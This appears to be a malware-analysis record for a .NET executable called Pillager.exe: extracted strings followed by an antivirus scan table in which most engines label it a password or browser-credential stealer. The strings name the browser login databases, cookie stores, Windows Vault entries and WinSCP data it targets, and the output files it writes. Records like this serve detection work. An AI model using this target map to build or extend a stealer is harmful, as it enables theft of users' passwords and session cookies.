HostName
rawpass:
WinSCP
cookies.sqlite
moz_cookies
places.sqlite
moz_places
moz_bookmarks
logins.json
key4.db
metadata
item2)
2A864886F70D010C050103
ISO-8859-1
password-check
2A864886F70D01050D
nssPrivate
[URL] -> {
[USERNAME] -> {
[^\u0020-\u007F]
[PASSWORD] -> {
encType
timesUsed
timeCreated
timeLastUsed
timePasswordChanged
_cookies.txt
_history.txt
_books.txt
_passwords.txt
storage-sync-v2.sqlite
storage-sync-v2.sqlite-shm
storage-sync-v2.sqlite-wal
FireFox
Mozilla\Firefox\Profiles
Don't support recovery IE password from wow64 process
[ERROR] Unable to enumerate vaults. Error (0x
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
Unable to open the following vault:
. Error: 0x
[ERROR] Unable to enumerate vault items from the following vault:
. Error 0x
SchemaId
pResourceElement
pIdentityElement
LastModified
pPackageSid
Error occured while retrieving vault item. Error: 0x
pAuthenticatorElement
Vault Type : {
LastModified : {
Software\Microsoft\Internet Explorer\TypedURLs
URL=(.*?)\n
Cookies
encrypted_value
HistoryUrl3.db
UserRankUrl
FormData3.dat
favorite3.dat
Local Storage
OldSogouExplorer
SogouExplorer\Webkit\Default
\Login Data
logins
origin_url
username_value
password_value
\History
\360History
\Cookies
\Network\Cookies
expires_utc
"domain": "
"expirationDate":
"hostOnly": false,
"name": "
"path": "
"session": true,
"storeId": null,
"value": "
\Bookmarks
\360Bookmarks
\Extensions
manifest.json
"name": "(.*?)"
Default
Profile
_extension.txt
\Local Storage
\Local Extension Settings
\Sync Extension Settings
Chrome
Google\Chrome\User Data
Chrome Beta
Google\Chrome Beta\User Data
Chromium
Chromium\User Data
Chrome SxS
Google\Chrome SxS\User Data
Microsoft\Edge\User Data
Brave-Browser
BraveSoftware\Brave-Browser\User Data
QQBrowser
Tencent\QQBrowser\User Data
SogouExplorer
Sogou\SogouExplorer\User Data
360ChromeX
360ChromeX\Chrome\User Data
360Chrome
360Chrome\Chrome\User Data
Vivaldi
Vivaldi\User Data
CocCoc
CocCoc\Browser\User Data
Torch\User Data
Kometa
Kometa\User Data
Orbitum
Orbitum\User Data
CentBrowser
CentBrowser\User Data
7Star\7Star\User Data
Sputnik
Sputnik\Sputnik\User Data
Epic Privacy Browser
Epic Privacy Browser\User Data
uCozMedia\Uran\User Data
Yandex
Yandex\YandexBrowser\User Data
Iridium
Iridium\User Data
Opera Software\Opera Stable
Opera GX
Opera Software\Opera GX Stable
Unable to find the section in the dictionary list:
default
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Pillager
FileVersion
1.0.0.0
InternalName
Pillager.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
Pillager.exe
ProductName
Pillager
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus | Signature
Bkav | W32.AIDetectMalware.CS
Lionic | Trojan.Win32.Stealer.12!c
tehtris | Clean
ClamAV | Win.Packed.Msilperseus-9956592-0
CMC | Clean
CAT-QuickHeal | Trojan.YakbeexMSIL.ZZ4
Skyhigh | Artemis!Trojan
McAfee | Artemis!BC185611C979
Cylance | Unsafe
Zillya | Trojan.Agent.Win32.3863987
Sangfor | Infostealer.Msil.Agent.V556
K7AntiVirus | Password-Stealer ( 005a45251 )
Alibaba | TrojanSpy:MSIL/Stealer.1ec19f01
K7GW | Password-Stealer ( 005a45251 )
Cybereason | malicious.1c9793
Baidu | Clean
VirIT | Trojan.Win32.MSIL_Heur.A
Paloalto | generic.ml
Symantec | ML.Attribute.HighConfidence
Elastic | malicious (high confidence)
ESET-NOD32 | a variant of MSIL/Spy.AgentTesla.K
APEX | Clean
Avast | Win32:BankerX-gen [Trj]
Cynet | Clean
Kaspersky | HEUR:Trojan-Spy.MSIL.Bobik.gen
BitDefender | IL:Trojan.MSILZilla.35894
NANO-Antivirus | Trojan.Win32.Bobik.kjpqmp
ViRobot | Clean
MicroWorld-eScan | IL:Trojan.MSILZilla.35894
Tencent | Malware.Win32.Gencirc.14036bfb
TACHYON | Clean
Sophos | Mal/Generic-S
F-Secure | Trojan.TR/AD.GenSteal.mpbun
DrWeb | Clean
VIPRE | IL:Trojan.MSILZilla.35894
TrendMicro | TROJ_GEN.R06CC0DBH24
McAfeeD | ti!BC72F283A8DD
Trapmine | Clean
FireEye | IL:Trojan.MSILZilla.35894
Emsisoft | IL:Trojan.MSILZilla.35894 (B)
SentinelOne | Static AI - Malicious PE
GData | IL:Trojan.MSILZilla.35894
Jiangmin | Clean
Webroot | Clean
Varist | W32/MSIL_Agent.CMA.gen!Eldorado
Avira | TR/AD.GenSteal.mpbun
Antiy-AVL | Trojan[Banker]/MSIL.Evital
Kingsoft | MSIL.Trojan-Spy.Bobik.gen
Gridinsoft | Clean
Xcitium | Clean
Arcabit | IL:Trojan.MSILZilla.D8C36
SUPERAntiSpyware | Clean
ZoneAlarm | HEUR:Trojan-Spy.MSIL.Bobik.gen
Microsoft | Trojan:MSIL/Stealer.SM!MTB
Google | Detected
AhnLab-V3 | Trojan/Win.Stealer.C5595363
Acronis | Clean
BitDefenderTheta | Gen:NN.ZemsilF.36808.im0@aK6lBmh
MAX | malware (ai score=83)
VBA32 | Trojan.MSIL.InfoStealer.gen.B
Malwarebytes | Malware.AI.970917950
Panda | Trj/GdSda.A
Zoner | Clean
TrendMicro-HouseCall | TROJ_GEN.R06CC0DBH24
Rising | Stealer.Agent!1.B723 (CLASSIC)
Yandex | Clean
Ikarus | Trojan.MSIL.PSW
MaxSecure | Trojan.Malware.74169853.susgen
Fortinet | MSIL/Agent.SLF!tr
AVG | Win32:BankerX-gen [Trj]
DeepInstinct | MALICIOUS
CrowdStrike | win/malicious_confidence_70% (D)
alibabacloud | Trojan:MSIL/Pswtool.BrowserPass
No IRMA results available.